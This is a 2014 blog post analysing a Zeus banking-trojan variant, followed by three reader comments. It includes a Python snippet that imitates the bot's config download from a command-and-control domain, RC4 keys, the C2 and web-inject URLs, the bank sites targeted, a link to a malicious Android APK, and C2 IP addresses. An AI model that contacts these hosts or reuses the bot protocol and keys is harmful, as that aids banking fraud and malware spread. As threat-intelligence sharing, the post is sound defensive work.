Tuesday, 4 March 2014

Zeus 1.1.3.4

RSA FirstWatch throw me recently a sample of a 'new' Zeus variant.
I didn't really check all the changes that were made but seem it's nothing more than just a standard Zeus v2.
But wait, it communicates over SSL and had a new kind of HTTP request pattern:

Fiddler:

Config download in python:
import urllib2

request = urllib2.Request('https://secureinformat.com/?ajax')
request.add_header('Accept', '*/*')
request.add_header('X_ID', '14E255CE7875768FBC303C10')
request.add_header('X_OS', '510')
request.add_header('X_BV', '1.1.3.4')
request.add_header('Control', 'no-cache')
request.add_header('User-Agent', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729;')
page = urllib2.urlopen(request).read()
open('ajax', 'w').write(page)

Notice the new headers:
X_ID = Bot ID
X_OS = OS version
X_BV = Variant version

The answer of the server have X_ID as cookie:
<< HTTP/1.1 200 OK
<< Date: Fri, 28 Feb 2014 06:35:34 GMT
<< Server: Apache
<< Set-Cookie: X_ID=14E255CE7875768FBC303C10; expires=Sat, 28-Feb-2015 06:35:34 GMT; path=/
<< Content-Description: File Transfer
<< Content-Disposition: attachment; filename=ajax
<< Content-Transfer-Encoding: binary
<< Expires: 0
<< Cache-Control: must-revalidate, post-check=0, pre-check=0
<< Pragma: public
<< Content-Length: 3685
<< Connection: close
<< Content-Type: application/octet-stream

Sample: bb9fe8c3df598b8b6ea2f2653c38ecd2
Version: 1.1.3.4
RC4: E2 82 3E B3 04 11 15 34 17 64 01 DC 7D B8 A5 35 CB 00 19 AA 81 59 6E 1B 85 7E 44 CA 10 90 40 2A C3 36 20 C5 C2 55 E6 F4 43 67 5B 42 4D 21 98 D4 78 70 1A 6F 72 24 88 B4 0A E7 B9 BC C1 8E 8F 79 86 CC 5F 46 FC A9 1C F0 74 E0 C0 3F 8D DD EC 4C 66 A0 02 97 C6 99 BB 7F 0D A8 3A 27 07 E8 75 80 28 54 93 D3 BD 2C EA 9D F6 0B 45 2E F1 EB A3 0E 9E BA 4B 9F 09 89 56 29 C4 48 23 14 2F DA F5 39 3B 8C CD 2B 37 41 A2 95 0F C9 BE AD F8 D7 DE C8 B5 0C 76 51 DF 5D B2 D6 AC 83 52 08 50 92 E1 B0 9C AE CF E4 ED B1 5E 7C 6A 96 65 26 87 2D 12 8A 9A A4 FF 94 D2 7A C7 47 31 7B EE CE DB 32 B7 06 D1 F2 EF AB AF 3C 18 84 E3 22 61 03 3D D9 9B 05 58 D8 30 F7 F3 B6 62 8B 1E 6C 71 FA 4A 4E 63 60 4F 16 6D 25 FB 53 FD 13 33 D0 E9 73 68 F9 69 A6 38 57 6B 5A 49 1D A1 A7 1F BF 5C D5 E5 91 77 FE
Drop Point: http://localhost/gate.php
Infection Point: http://localhost/bot.exe
Update Point:
http://secureinformat.com/?ajax (static config)

For unpacking the config, here again nothing new, regular Zeus v2.
Once unpacked, we can see that the malware is targeting German banks and Trusteer:
http*://*netbanking.sparkasse.at/hilfe/sicherheit*
https://*banking.berliner-bank.de/trxm*
https://*banking.co.at*
https://*commerzbank.de*
https://*commerzbanking.de*
https://*meine.deutsche-bank.de/trxm/db*
https://*meine.norisbank.de/trxm/noris*
https://banking.postbank.de/rai*
https://banking.sparda.de*
https://finanzportal.fiducia.de*
https://netbanking.sparkasse.at/*
https://netbanking.sparkasse.at/casserver/login*
https://netbanking.sparkasse.at/sPortal/*
https://online-*.unicredit.it/*
https://online.bankaustria.at*
https://*commerzbank.de*
https://*commerzbanking.de*
https://*meine.deutsche-bank.de/trxm/db*
https://*meine.norisbank.de/trxm/noris*
https://www.trusteer.com/ProtectYourMoney*
WebInjects:
https://secure730.com/oz1/service.in?id=50
https://secure730.com/oz1/service.in?id=44
https://secure730.com/oz1/service.in?id=43
https://secure730.com/oz1/service.in?id=41
https://secure730.com/oz1/service.in?id=7
https://secure730.com/oz1/service.in?id=6
https://secure730.com/oz1/service.in?id=4
https://secure730.com/oz1/service.in?id=3
https://secure730.com/oz1/service.in?id=2
https://secure730.com/oz1/service.in?id=1
https://secureinformat.com/id/351
https://secureinformat.com/id/350
https://secureinformat.com/id/51
https://secureinformat.com/id/10

Man in the browser:

Clean browser surfing Trusteer website:

Infected browser surfing Trusteer website:
Requesting the user to download an APK:
Test done on the latest Firefox version (v27.0.1)

bit.ly/1jmQHmA = hxtp://shlyxiest.biz/cdn/Trusteer-Mobile.apk
>> https://www.virustotal.com/en/file/2f82ce7288137c0acbeefd9ef9f63926057871611703e77803b842201009767a/analysis/1393786189/
Phone number:  79670478968

Identified as Perkel.c by Kaspersky, Perkel is an android malware who was sold by Perkele (this guy was later banned from underground forums for scaming but it's another story)

Sort of Fake AV:

Sample: 917df7b6268ba705b192b89a1cf28764
Version: 1.1.3.4
RC4: E2 82 3E B3 04 11 15 34 17 64 01 DC 7D B8 A5 35 CB 00 19 AA 81 59 6E 1B 85 7E 44 CA 10 90 40 2A C3 36 20 C5 C2 55 E6 F4 43 67 5B 42 4D 21 98 D4 78 70 1A 6F 72 24 88 B4 0A E7 B9 BC C1 8E 8F 79 86 CC 5F 46 FC A9 1C F0 74 E0 C0 3F 8D DD EC 4C 66 A0 02 97 C6 99 BB 7F 0D A8 3A 27 07 E8 75 80 28 54 93 D3 BD 2C EA 9D F6 0B 45 2E F1 EB A3 0E 9E BA 4B 9F 09 89 56 29 C4 48 23 14 2F DA F5 39 3B 8C CD 2B 37 41 A2 95 0F C9 BE AD F8 D7 DE C8 B5 0C 76 51 DF 5D B2 D6 AC 83 52 08 50 92 E1 B0 9C AE CF E4 ED B1 5E 7C 6A 96 65 26 87 2D 12 8A 9A A4 FF 94 D2 7A C7 47 31 7B EE CE DB 32 B7 06 D1 F2 EF AB AF 3C 18 84 E3 22 61 03 3D D9 9B 05 58 D8 30 F7 F3 B6 62 8B 1E 6C 71 FA 4A 4E 63 60 4F 16 6D 25 FB 53 FD 13 33 D0 E9 73 68 F9 69 A6 38 57 6B 5A 49 1D A1 A7 1F BF 5C D5 E5 91 77 FE
Drop Point: http://localhost/gate.php
Infection Point: http://localhost/bot.exe
Update Points:
https://koloboktv.com/?ajax (static config)
https://securestakan2.net/?ajax (dynamic config)
https://securemagnit5.net/?ajax (dynamic config)
WebInjects:
https://pikachujp.com/oz1/service.in?id=50
https://pikachujp.com/oz1/service.in?id=44
https://pikachujp.com/oz1/service.in?id=43
https://pikachujp.com/oz1/service.in?id=41
https://pikachujp.com/oz1/service.in?id=7
https://pikachujp.com/oz1/service.in?id=6
https://pikachujp.com/oz1/service.in?id=4
https://pikachujp.com/oz1/service.in?id=3
https://pikachujp.com/oz1/service.in?id=2
https://pikachujp.com/oz1/service.in?id=1
https://koloboktv.com/id/351
https://koloboktv.com/id/350
https://koloboktv.com/id/51
https://koloboktv.com/id/10

Sample: 7fb62987f20b002475cb1499eb86a1f5
Version: 1.1.2.1
RC4: 30 72 E6 32 80 EF BD 92 BE DD 3B 1C 58 45 33 2F 41 53 A9 26 8E 20 4D 8A DB 6A F6 8B CE 4C B6 38 02 2B 6C 15 A1 2C 2D C2 ED 0E BB BF 64 40 F1 9F D2 36 07 C3 CF 8D AA D3 A5 42 C0 9B 48 49 67 81 98 75 51 1B 96 6E 97 4A 59 DE 44 65 85 7B 35 16 0C 23 4F FE 5B FA D7 84 A7 46 EE 82 DF E1 6B AD 94 CB 18 C4 8C 0F E7 00 E0 7E CA 24 1A 7A A6 73 3C 03 F5 9C EA 1E FB D4 0B 14 11 22 06 F4 6D 55 E5 93 F9 E2 69 D5 CD 27 E8 12 C8 77 0D 08 A2 B7 0A 01 D8 EB 3F AB 3A 61 83 04 86 CC FD F3 5F 63 09 AC AF 66 17 B9 56 19 F2 C7 47 43 25 1D 89 29 99 2E C1 87 54 C9 62 34 74 4B A0 B1 3E 21 57 52 2A 39 FF 05 BC C6 A4 4E 3D 9D E3 D9 BA 76 5C AE A3 FC B4 B3 D6 28 5A 68 F7 31 7D 7F E4 1F 37 D1 90 B5 B0 D0 C5 79 DA 13 71 A8 7C EC F8 E9 60 50 88 78 70 10 B2 5E 8F 6F 9A B8 95 DC 9E 91 F0 5D
Update Point:
https://securestatic.com/?ajax (static config)

All these samples use the same IP range:
• dns: 1 ›› ip: 37.228.92.170 - adress: SECURE730.COM
• dns: 1 ›› ip: 37.228.92.169 - adress: SECUREINFORMAT.COM
• dns: 1 ›› ip: 37.228.92.148 - adress: SHLYXIEST.BIZ
• dns: 1 ›› ip: 37.228.92.147 - adress: SECURESTATIC.COM
• dns: 1 ›› ip: 37.228.92.146 - adress: KOLOBOKTV.COM

I've wrote a small yara rule in hope to see more of these.
All configs that i grabbed was reporting to localhost not to a server...





3 comments:

  1. You wrte "For unpacking the config, here again nothing new, regular Zeus v2.".
    Could you please provide some more info about it? how do you actually unpack the config?

    ReplyDelete
  2. I think there are three possible explanations for "localhost"

    1) The author was testing 1.1.3.4 on his machine and the sample got outside of the "test environment" somehow (but I don't think so)

    2) Bad configuration

    3) 1.1.3.4 is using TOR for communication with the C&C (as seen in some zbot variants)

    Which do you think it is xyl?

    ReplyDelete
  3. Nice write up.
    Please post more like this.

    ReplyDelete